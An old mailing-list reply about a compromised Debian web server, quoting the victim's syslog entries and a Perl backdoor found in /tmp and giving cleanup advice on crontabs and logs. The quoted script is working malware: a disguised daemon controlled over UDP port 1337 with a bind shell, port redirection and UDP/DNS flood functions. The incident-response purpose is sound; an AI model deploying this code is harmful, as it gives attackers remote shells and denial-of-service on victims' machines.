Re: a weird script worm uploaded via php with debian 3.0 ?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi
On Tuesday 10 June 2003 21:58, Robert Ebright wrote:
Have you copy to the new server the home directory of the user www-data?
in debian is located in the root directory of the web server, so if you have
copy the document root from the old server yo have copy all the dot files for
the user , and rather possible you have copy the crontab file of www-data.
If you look syslog entries you can figure out how the worm replicates himself
and how the rootkit is enabled.... ( only guessing )
> and under SYSLOG it starts
>
the systems find a crontab for the user www-data
user www-data has exec the command crontab -l
> syslog.3:Jun 6 16:27:27 debian crontab[26795]:
> (www-data) LIST (www-data)
and have replaced the file
>syslog.3:Jun 6
> 16:27:28 debiancrontab[26798]:
> (www-data) REPLACE (www-data)
hummmmmmm, maybe he isn't very smart, www-data have do it again
>syslog.3:Jun 6
> 16:27:34debian crontab[26804]:
> (www-data) LIST (www-data)syslog.3:Jun 6
> 16:27:34 debiancrontab[26807]:
> (www-data) REPLACE (www-data)
cron sees the new crontab file for www-data , read the file, and execute the
commands...
>syslog.3:Jun 6
> 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
> (/tmp/.nscdrecover)
>
hummmmmmmmmmmmmmm you have to figure out how the /tmp/.nscdrecover has been
copy, is difficult to say but maybe another www-data crontab entry of the
user www-data starts the work.... who knows...
> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>
it sounds like a local exploit against nscd which is trying to get a root
shell and put it on the wire....
> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a
> rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp",
> Listen => 1, ReuseAddr => 1,
> LocalPort =>$port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp",
> PeerAddr => $dest) or exit;$sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $host,
> PeerPort => int(rand 65535))
> or exit;
> $sock->autoflush(1); $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto
> => 'udp', PeerAddr => $host,
> PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
>
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3
>\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, "</dev/null";
> open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp',
> LocalPort => 1337, ReuseAddr => 1) or
> exit;while($string =<$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split "
> ", $string; next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock =
> IO::Socket::INET->new(Proto =>
> 'udp', PeerAddr => $arg1,
> PeerPort => $arg2,
> ReuseAddr => 1) or
> next;
> print $bsock "pong
> ".`uname -mnrs`; close $bsock;
> } elsif ($cmd eq "die") {
> exit if(crypt($arg1, $pass) eq $pass);
> } elsif ($cmd eq "redir") {
> redir($arg1, $arg2) unless(fork);
> } elsif ($cmd eq "shell") {
> shell($arg1) unless(fork);
> } elsif ($cmd eq "udp") {
> udp($arg1, $arg2) unless(fork);
> } elsif ($cmd eq "ddns") {
> ddns($arg1, $arg2) unless(fork);
> }
> }
>
>
>
> A little history is that my server was hacked
> with some trojan that was sending out SPAM and I
> did a fresh reinstall with debian so I could
> have automatic updates and the like. I copied
> over a few of the home directorys from the old
> site.Then this all started after a user logged
> in onFriday June 6th first login at 14:16 ending
> 14:24the script starts at 14:27
>
>
> worldspe ftpd26405 pm6-s104.amazon. Fri Jun
> 6 15:06 - 15:06 (00:00)worldspe ftpd26325
> pm6-s104.amazon. Fri Jun
> 6 14:51 - 14:51 (00:00)worldspe ftpd26315
> pm6-s104.amazon. Fri Jun
> 6 14:49 - 14:49 (00:00)worldspe ftpd26291
> pm6-s104.amazon. Fri Jun
> 6 14:43 - 14:44 (00:00)worldspe ftpd26183
> pm6-s104.amazon. Fri Jun
> 6 14:16 - 14:24 (00:07)
>
> The question is could this of been started via a
> php script and if so what should I look for in
> order to neutralize it and communicate with this
> user ?
> I already moved the /tmp file out.
>
> While greping the php files I found nothing that
> had /tmp or ncsd listed in it at all. This is
> just kind of weird, and I was wondering if
> anybody could be of help. Also no other files or
> cgi-bin files were uploaded, so it might just be
> a coincidence, but my logic points to it being
> something that happened via something that was
> uploaded.
look carefully at webserver access and error log, maybe you have some buggy
php code that allows remote execution of commands...
the crontab afaire it's a silly way of using www-data to get a local root
shell on the wire so you can telnet to it and gain remote root access.
>
>
> I just don't know where this came from. I am
> running Debian 3.0 woody with all security
> update files. I ran rtkitchk and found nothing.
> So I'm really perplexed as to what could of got
> this script on the server. Any help would be
> greatly appreciated as I found nothing about
> this script by google.
hummmmmmmmmmmmmmm, look at www-data home directory, in the old and the new
machine ( maybe the crontab was there in the hacked machine www-data
directory and it was not uploaded freshly to the new box , and read crontab
man page... in the meanwhile y will add the user www-data to /etc/cron.deny
if i were you
Regards
Victor
- --
Lo que la naturaleza no da....
O'reilly & Associates no lo prestan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+5zyTEzqHF8R72ekRAvBNAJwNkpsXnTvHv5NM8qXeFWsyUq6kJwCeO5/b
bOqszSJYuRaxurdzhu9BGbA=
=BX70
-----END PGP SIGNATURE-----
Reply to: